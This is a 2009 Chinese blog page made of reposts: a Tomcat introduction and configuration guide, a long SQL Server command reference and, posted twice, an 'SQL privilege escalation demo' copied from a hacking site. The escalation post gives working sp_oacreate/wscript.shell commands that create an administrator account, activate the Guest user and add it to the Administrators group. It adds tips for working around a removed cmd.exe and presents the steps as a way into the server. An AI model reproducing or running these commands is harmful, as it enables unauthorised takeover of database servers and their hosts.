tomcat WEB 服务器

2009年4月29日星期三 | | 0 评论 |

  tomcat
简介  Tomcat 服务器是一个免费的开放源代码的Web 应用服务器,目前最新版本是6.0.18(截止到2008-08-27)。
  Tomcat是Apache 软件基金会(Apache Software Foundation)的Jakarta 项目中的一个核心项目,由Apache、Sun 和其他一些公司及个人共同开发而成。由于有了Sun 的参与和支持,最新的Servlet 和JSP 规范总是能在Tomcat 中得到体现,Tomcat 5 支持最新的Servlet 2.4 和JSP 2.0 规范。因为Tomcat 技术先进、性能稳定,而且免费,因而深受Java 爱好者的喜爱并得到了部分软件开发商的认可,成为目前比较流行的Web 应用服务器。
  Tomcat 很受广大程序员的喜欢,因为它运行时占用的系统资源小,扩展性好,支持负载平衡与邮件服务等开发应用系统常用的功能;而且它还在不断的改进和完善中,任何一个感兴趣的程序员都可以更改它或在其中加入新的功能。
  Tomcat 是一个小型的轻量级应用服务器,在中小型系统和并发访问用户不是很多的场合下被普遍使用,是开发和调试JSP 程序的首选。对于一个初学者来说,可以这样认为,当在一台机器上配置好Apache 服务器,可利用它响应对HTML 页面的访问请求。实际上Tomcat 部分是Apache 服务器的扩展,但它是独立运行的,所以当你运行tomcat 时,它实际上作为一个与Apache 独立的进程单独运行的。
  这里的诀窍是,当配置正确时,Apache 为HTML页面服务,而Tomcat 实际上运行JSP 页面和Servlet。另外,Tomcat和IIS、Apache等Web服务器一样,具有处理HTML页面的功能,另外它还是一个Servlet和JSP容器,独立的Servlet容器是Tomcat的默认模式。不过,Tomcat处理静态HTML的能力不如Apache服务器。

最新版本与规范的对照

  Servlet/JSP_ 规范版本 Apache Tomcat 版本
  ---------------------------------------------
  2.5/2.1____ 6.0.18
  2.4/2.0____ 5.5.25
  2.3/1.2____ 4.1.36
  2.2/1.1____ 3.3.2

常用功能的配置方法
  

  1 启动内存参数的配置
  tomcat/bin/catalina.bat 如果是linux 就是 catalina.sh
  在rem 的后面增加如下参数
  set JAVA_OPTS= -Xms256m -Xmx256m -XX:MaxPermSize=64m
  2 修改Tomcat的JDK目录
  打开tomcat/bin/catalina.bat
  在最后一个rem后面增加
  set JAVA_HOME=C:\Program Files\Java\jdk1.6.0
  3 增加虚拟目录
  /tomcat/conf/setver.xml
  第一行是以前默认存在的,第二行是新增的
  <Context path="" docBase="ROOT" debug="0" reloadable="true"></Context>
  <Context path="/jsp/a" reloadable="true" docBase="E:\workplace\www.java2000.net\WebContent" />
  4 GET方式URL乱码问题解决
  打开 tomcat/conf/server.xml
  查找下面这部分,在最后增加一段代码就可以了。
  <Connector port="80" maxHttpHeaderSize="8192"
  .................
  URIEncoding="UTF-8" useBodyEncodingForURI="true"
  ...............
  />
  其中的UTF-8 请根据你的需要自己修改,比如GBK
  5 虚拟主机配置文件
  tomcat/conf/server.xml
  <!-- 默认的主机 -->
  <Host name="localhost" appBase="webapps"
  unpackWARs="true" autoDeploy="true"
  xmlValidation="false" xmlNamespaceAware="false">
  <Context path="" docBase="ROOT" debug="0" reloadable="true"></Context>
  ...
  </host>
  <!-- 以下是新增的虚拟主机 -->
  <Host name="www.java2000.net" appBase="webapps"
  unpackWARs="true" autoDeploy="true"
  xmlValidation="false" xmlNamespaceAware="false">
  <Context path="" docBase="d:/www.java2000.net" debug="0" reloadable="true"></Context>
  <!-- 虚拟目录 -->
  <Context path="/count" docBase="d:/counter.java2000.net" debug="0" reloadable="true"></Context>
  </Host>
  <Host name="java2000.net" appBase="webapps"
  unpackWARs="true" autoDeploy="true"
  xmlValidation="false" xmlNamespaceAware="false">
  <Context path="" docBase="d:/www.java2000.net" debug="0" reloadable="true"></Context>
  <Context path="/count" docBase="d:/counter.java2000.net" debug="0" reloadable="true"></Context>
  </Host>
  6 数据源配置
  比较复杂,各个版本都有所不同,请直接查看 http://java2000.net/p1906,包括tomcat5.0,tomcat5.5x,tomcat6.0的各个版本的配置方法。
  更多关于Tomcat的使用,请看参考资料
  美国F-14战斗机绰号汤姆猫,即tomcat.
扩展阅读:
1.http://tomcat.apache.org Tomcat官方站点
2.http://tomcat.java2000.net JAVA世纪网,Tomcat的专版
3.http://www.java2000.net/p6586 Apache+Tomcat负载均衡和集群的尝试
4.http://www.java2000.net/p151 Tomcat 启动 /servlet/ 的访问
5.http://www.java2000.net/p7398 非安装型的Tomcat如何注册成为服务
6.http://www.java2000.net/p2431 Apache 与 Tomcat 的集成(jk)
7.http://www.java2000.net/p4958 启用支持gzip压缩
8.http://www.java2000.net/p4969 限制ip,限制主机访问等
9.http://www.java2000.net/p4957 解决URI的乱码问题
10.http://www.java2000.net/p6497 windows2003 + IIS6 + TOMCAT6 + J2SE1.5.0
11.http://www.chinaitlab.com/www/techspecial/tomcat/ Tomcat安装配置专题
12.http://java.chinaitlab.com/Tomcat/522601.html
 
我的QQ空间
Mysql+PHPmyadmin提权技巧
Mysql+PHPmyadmin提权技巧本篇文章来源于 新世纪网安基地 (www.5...
 

SQL提权演示

2009年4月21日星期二 | | 0 评论 |

 
 
SQL提权演示
  首先想给大家了解一下SQL提权常用命令:
driver={SQL Server};server=服务器IP;uid=用户名;pwd=密码;database=数据库名  --连接数据库。
eclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 新用户 密码 /add'  --添加新用户。
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 新用户 /add'  --把用户加到管理组
  如果以上添加管理员失败的时候,我们可以尝试激活Guest。
eclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user guest /active:yes'  --激活GUEST用户

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup Administrators Guest /add'  --把Guest加到管理组
  注意:如果c:\windows\system32\cmd.exe 被删除,没权限访问或者拒绝访问的话,我们可以自己上传个CMD上去,然后路径修改我们上传的CMD路径就可以了。
 
下面给大家演示一下整个SQL提权的过程:
默认GUEST用户密码为空禁用状态!
激活GUEST用户

激活GUEST用户成功,但是没有权限,所以我们继续把GUEST这个用户添加到管理组!
把Guest加到管理组

成功把GUEST加到了管理组,成功进入了服务器!

进去后能做些什么?相信这个就不用我罗嗦了。
本篇文章来源于 新世纪网安基地 (www.520hack.com) 原文出处:http://www.520hack.com/Article/Text2/200807/10572.html

我的QQ空间
Mysql+PHPmyadmin提权技巧
Mysql+PHPmyadmin提权技巧本篇文章来源于 新世纪网安基地 (www.5...
 

SQL提权演示

| | 0 评论 |

 
 
SQL提权演示
 
  首先想给大家了解一下SQL提权常用命令:
driver={SQL Server};server=服务器IP;uid=用户名;pwd=密码;database=数据库名  --连接数据库。
eclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 新用户 密码 /add'  --添加新用户。
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 新用户 /add'  --把用户加到管理组
  如果以上添加管理员失败的时候,我们可以尝试激活Guest。
eclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user guest /active:yes'  --激活GUEST用户

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup Administrators Guest /add'  --把Guest加到管理组
  注意:如果c:\windows\system32\cmd.exe 被删除,没权限访问或者拒绝访问的话,我们可以自己上传个CMD上去,然后路径修改我们上传的CMD路径就可以了。
 
下面给大家演示一下整个SQL提权的过程:
默认GUEST用户密码为空禁用状态!
 
激活GUEST用户
 
激活GUEST用户成功,但是没有权限,所以我们继续把GUEST这个用户添加到管理组!
 
把Guest加到管理组
 
成功把GUEST加到了管理组,成功进入了服务器!
 
进去后能做些什么?相信这个就不用我罗嗦了。
 

本篇文章来源于 新世纪网安基地 (www.520hack.com) 原文出处:http://www.520hack.com/Article/Text2/200807/10572.html
我的QQ空间
Mysql+PHPmyadmin提权技巧
Mysql+PHPmyadmin提权技巧本篇文章来源于 新世纪网安基地 (www.5...
 

[转帖]SQL命令大全

2009年4月17日星期五 | | 0 评论 |

   

SQL code

--语 句 功 能

--数据操作

SELECT --从数据库表中检索数据行和列

INSERT --向数据库表添加新数据行

DELETE --从数据库表中删除数据行

UPDATE --更新数据库表中的数据

--数据定义

CREATE TABLE --创建一个数据库表

DROP TABLE --从数据库中删除表

ALTER TABLE --修改数据库表结构

CREATE VIEW --创建一个视图

DROP VIEW --从数据库中删除视图

CREATE INDEX --为数据库表创建一个索引

DROP INDEX --从数据库中删除索引

CREATE PROCEDURE --创建一个存储过程

DROP PROCEDURE --从数据库中删除存储过程

CREATE TRIGGER --创建一个触发器

DROP TRIGGER --从数据库中删除触发器

CREATE SCHEMA --向数据库添加一个新模式

DROP SCHEMA --从数据库中删除一个模式

CREATE DOMAIN --创建一个数据值域

ALTER DOMAIN --改变域定义

DROP DOMAIN --从数据库中删除一个域

--数据控制

GRANT --授予用户访问权限

DENY --拒绝用户访问

REVOKE --解除用户访问权限

--事务控制

COMMIT --结束当前事务

ROLLBACK --中止当前事务

SET TRANSACTION --定义当前事务数据访问特征

--程序化SQL

DECLARE --为查询设定游标

EXPLAN --为查询描述数据访问计划

OPEN --检索查询结果打开一个游标

FETCH --检索一行查询结果

CLOSE --关闭游标

PREPARE --为动态执行准备SQL 语句

EXECUTE --动态地执行SQL 语句

DESCRIBE --描述准备好的查询

---局部变量

declare @id char(10)

--set @id = '10010001'

select @id = '10010001'

---全局变量

---必须以@@开头

 

--IF ELSE

declare @x int @y int @z int

select @x = 1 @y = 2 @z=3

if @x > @y

print 'x > y' --打印字符串'x > y'

else if @y > @z

print 'y > z'

else print 'z > y'

 

--CASE

use pangu

update employee

set e_wage =

case

when job_level = '1' then e_wage*1.08

when job_level = '2' then e_wage*1.07

when job_level = '3' then e_wage*1.06

else e_wage*1.05

end

 

--WHILE CONTINUE BREAK

declare @x int @y int @c int

select @x = 1 @y=1

while @x < 3

begin

print @x --打印变量x 的值

while @y < 3

begin

select @c = 100*@x + @y

print @c --打印变量c 的值

select @y = @y + 1

end

select @x = @x + 1

select @y = 1

end

 

--WAITFOR

--例 等待1 小时2 分零3 秒后才执行SELECT 语句

waitfor delay '01:02:03'

select * from employee

--例 等到晚上11 点零8 分后才执行SELECT 语句

waitfor time '23:08:00'

select * from employee

 

 

***SELECT***

 

select *(列名) from table_name(表名) where column_name operator value

ex:(宿主)

select * from stock_information where stockid = str(nid)

stockname = 'str_name'

stockname like '% find this %'

stockname like '[a-zA-Z]%' --------- ([]指定值的范围)

stockname like '[^F-M]%' --------- (^排除指定范围)

--------- 只能在使用like关键字的where子句中使用通配符)

or stockpath = 'stock_path'

or stocknumber < 1000

and stockindex = 24

not stocksex = 'man'

stocknumber between 20 and 100

stocknumber in(10,20,30)

order by stockid desc(asc) --------- 排序,desc-降序,asc-升序

order by 1,2 --------- by列号

stockname = (select stockname from stock_information where stockid = 4)

--------- 子查询

--------- 除非能确保内层select只返回一个行的值,

--------- 否则应在外层where子句中用一个in限定符

select distinct column_name form table_name --------- distinct指定检索独有的列值,不重复

select stocknumber ,"stocknumber + 10" = stocknumber + 10 from table_name

select stockname , "stocknumber" = count(*) from table_name group by stockname

--------- group by 将表按行分组,指定列中有相同的值

having count(*) = 2 --------- having选定指定的组

 

select *

from table1, table2

where table1.id *= table2.id -------- 左外部连接,table1中有的而table2中没有得以null表示

table1.id =* table2.id -------- 右外部连接

 

select stockname from table1

union [all] ----- union合并查询结果集,all-保留重复行

select stockname from table2

 

***insert***

 

insert into table_name (Stock_name,Stock_number) value ("xxx","xxxx")

value (select Stockname , Stocknumber from Stock_table2)---valueselect语句

 

***update***

 

update table_name set Stockname = "xxx" [where Stockid = 3]

Stockname = default

Stockname = null

Stocknumber = Stockname + 4

 

***delete***

 

delete from table_name where Stockid = 3

truncate table_name ----------- 删除表中所有行,仍保持表的完整性

drop table table_name --------------- 完全删除表

 

***alter table*** --- 修改数据库表结构

 

alter table database.owner.table_name add column_name char(2) null .....

sp_help table_name ---- 显示表已有特征

create table table_name (name char(20), age smallint, lname varchar(30))

insert into table_name select ......... ----- 实现删除列的方法(创建新表)

alter table table_name drop constraint Stockname_default ---- 删除Stocknamedefault约束

----统计函数----

AVG --求平均值

COUNT --统计数目

MAX --求最大值

MIN --求最小值

SUM --求和

 

--AVG

use pangu

select avg(e_wage) as dept_avgWage

from employee

group by dept_id

 

--MAX

--求工资最高的员工姓名

use pangu

select e_name

from employee

where e_wage =

(select max(e_wage)

from employee)

 

--STDEV()

--STDEV()函数返回表达式中所有数据的标准差

 

--STDEVP()

--STDEVP()函数返回总体标准差

 

--VAR()

--VAR()函数返回表达式中所有值的统计变异数

 

--VARP()

--VARP()函数返回总体变异数

 

----算术函数----

 

/***三角函数***/

SIN(float_expression) --返回以弧度表示的角的正弦

COS(float_expression) --返回以弧度表示的角的余弦

TAN(float_expression) --返回以弧度表示的角的正切

COT(float_expression) --返回以弧度表示的角的余切

/***反三角函数***/

ASIN(float_expression) --返回正弦是FLOAT 值的以弧度表示的角

ACOS(float_expression) --返回余弦是FLOAT 值的以弧度表示的角

ATAN(float_expression) --返回正切是FLOAT 值的以弧度表示的角

ATAN2(float_expression1,float_expression2)

--返回正切是float_expression1 /float_expres-sion2的以弧度表示的角

DEGREES(numeric_expression)

--把弧度转换为角度返回与表达式相同的数据类型可为

--INTEGER/MONEY/REAL/FLOAT 类型

RADIANS(numeric_expression) --把角度转换为弧度返回与表达式相同的数据类型可为

--INTEGER/MONEY/REAL/FLOAT 类型

EXP(float_expression) --返回表达式的指数值

LOG(float_expression) --返回表达式的自然对数值

LOG10(float_expression)--返回表达式的以10 为底的对数值

SQRT(float_expression) --返回表达式的平方根

/***取近似值函数***/

CEILING(numeric_expression) --返回>=表达式的最小整数返回的数据类型与表达式相同可为

--INTEGER/MONEY/REAL/FLOAT 类型

FLOOR(numeric_expression) --返回<=表达式的最小整数返回的数据类型与表达式相同可为

--INTEGER/MONEY/REAL/FLOAT 类型

ROUND(numeric_expression) --返回以integer_expression 为精度的四舍五入值返回的数据

--类型与表达式相同可为INTEGER/MONEY/REAL/FLOAT 类型

ABS(numeric_expression) --返回表达式的绝对值返回的数据类型与表达式相同可为

--INTEGER/MONEY/REAL/FLOAT 类型

SIGN(numeric_expression) --测试参数的正负号返回0 零值1 正数或-1 负数返回的数据类型

--与表达式相同可为INTEGER/MONEY/REAL/FLOAT 类型

PI() --返回值为π 3.1415926535897936

RAND([integer_expression]) --用任选的[integer_expression]做种子值得出0-1 间的随机浮点数

 

 

----字符串函数----

ASCII() --函数返回字符表达式最左端字符的ASCII 码值

CHAR() --函数用于将ASCII 码转换为字符

--如果没有输入0 ~ 255 之间的ASCII 码值CHAR 函数会返回一个NULL

LOWER() --函数把字符串全部转换为小写

UPPER() --函数把字符串全部转换为大写

STR() --函数把数值型数据转换为字符型数据

LTRIM() --函数把字符串头部的空格去掉

RTRIM() --函数把字符串尾部的空格去掉

LEFT(),RIGHT(),SUBSTRING() --函数返回部分字符串

CHARINDEX(),PATINDEX() --函数返回字符串中某个指定的子串出现的开始位置

SOUNDEX() --函数返回一个四位字符码

--SOUNDEX函数可用来查找声音相似的字符串但SOUNDEX函数对数字和汉字均只返回0

DIFFERENCE() --函数返回由SOUNDEX 函数返回的两个字符表达式的值的差异

--0 两个SOUNDEX 函数返回值的第一个字符不同

--1 两个SOUNDEX 函数返回值的第一个字符相同

--2 两个SOUNDEX 函数返回值的第一二个字符相同

--3 两个SOUNDEX 函数返回值的第一二三个字符相同

--4 两个SOUNDEX 函数返回值完全相同

 

 

QUOTENAME() --函数返回被特定字符括起来的字符串

/*select quotename('abc', '{') quotename('abc')

运行结果如下

----------------------------------{

{abc} [abc]*/

 

REPLICATE() --函数返回一个重复character_expression 指定次数的字符串

/*select replicate('abc', 3) replicate( 'abc', -2)

运行结果如下

----------- -----------

abcabcabc NULL*/

 

REVERSE() --函数将指定的字符串的字符排列顺序颠倒

REPLACE() --函数返回被替换了指定子串的字符串

/*select replace('abc123g', '123', 'def')

运行结果如下

----------- -----------

abcdefg*/

 

SPACE() --函数返回一个有指定长度的空白字符串

STUFF() --函数用另一子串替换字符串指定位置长度的子串

 

 

----数据类型转换函数----

CAST() 函数语法如下

CAST() (<expression> AS <data_ type>[ length ])

CONVERT() 函数语法如下

CONVERT() (<data_ type>[ length ], <expression> [, style])

 

select cast(100+99 as char) convert(varchar(12), getdate())

运行结果如下

------------------------------ ------------

199 Jan 15 2000

 

----日期函数----

DAY() --函数返回date_expression 中的日期值

MONTH() --函数返回date_expression 中的月份值

YEAR() --函数返回date_expression 中的年份值

DATEADD(<datepart> ,<number> ,<date>)

--函数返回指定日期date 加上指定的额外日期间隔number 产生的新日期

DATEDIFF(<datepart> ,<number> ,<date>)

--函数返回两个指定日期在datepart 方面的不同之处

DATENAME(<datepart> , <date>) --函数以字符串的形式返回日期的指定部分

DATEPART(<datepart> , <date>) --函数以整数值的形式返回日期的指定部分

GETDATE() --函数以DATETIME 的缺省格式返回系统当前的日期和时间

 

----系统函数----

APP_NAME() --函数返回当前执行的应用程序的名称

COALESCE() --函数返回众多表达式中第一个非NULL 表达式的值

COL_LENGTH(<'table_name'>, <'column_name'>) --函数返回表中指定字段的长度值

COL_NAME(<table_id>, <column_id>) --函数返回表中指定字段的名称即列名

DATALENGTH() --函数返回数据表达式的数据的实际长度

DB_ID(['database_name']) --函数返回数据库的编号

DB_NAME(database_id) --函数返回数据库的名称

HOST_ID() --函数返回服务器端计算机的名称

HOST_NAME() --函数返回服务器端计算机的名称

IDENTITY(<data_type>[, seed increment]) [AS column_name])

--IDENTITY() 函数只在SELECT INTO 语句中使用用于插入一个identity column列到新表中

/*select identity(int, 1, 1) as column_name

into newtable

from oldtable*/

ISDATE() --函数判断所给定的表达式是否为合理日期

ISNULL(<check_expression>, <replacement_value>) --函数将表达式中的NULL 值用指定值替换

ISNUMERIC() --函数判断所给定的表达式是否为合理的数值

NEWID() --函数返回一个UNIQUEIDENTIFIER 类型的数值

NULLIF(<expression1>, <expression2>)

--NULLIF 函数在expression1 expression2 相等时返回NULL 值若不相等时则返回expression1 的值

 

 

--------------------------------------------------------------------------------

 

sql中的保留字

 

action add aggregate all

alter after and as

asc avg avg_row_length auto_increment

between bigint bit binary

blob bool both by

cascade case char character

change check checksum column

columns comment constraint create

cross current_date current_time current_timestamp

data database databases date

datetime day day_hour day_minute

day_second dayofmonth dayofweek dayofyear

dec decimal default delayed

delay_key_write delete desc describe

distinct distinctrow double drop

end else escape escaped

enclosed enum explain exists

fields file first float

float4 float8 flush foreign

from for full function

global grant grants group

having heap high_priority hour

hour_minute hour_second hosts identified

ignore in index infile

inner insert insert_id int

integer interval int1 int2

int3 int4 int8 into

if is isam join

key keys kill last_insert_id

leading left length like

lines limit load local

lock logs long longblob

longtext low_priority max max_rows

match mediumblob mediumtext mediumint

middleint min_rows minute minute_second

modify month monthname myisam

natural numeric no not

null on optimize option

optionally or order outer

outfile pack_keys partial password

precision primary procedure process

processlist privileges read real

references reload regexp rename

replace restrict returns revoke

rlike row rows second

select set show shutdown

smallint soname sql_big_tables sql_big_selects

sql_low_priority_updates sql_log_off sql_log_update sql_select_limit

sql_small_result sql_big_result sql_warnings straight_join

starting status string table

tables temporary terminated text

then time timestamp tinyblob

tinytext tinyint trailing to

type use using unique

unlock unsigned update usage

values varchar variables varying

varbinary with write when

where year year_month zerofill

 

 
我的QQ空间
Mysql+PHPmyadmin提权技巧
Mysql+PHPmyadmin提权技巧本篇文章来源于 新世纪网安基地 (www.5...
 
 


所有文章收集于网络,如果有牵扯到版权问题请与本站站长联系。谢谢合作![email protected]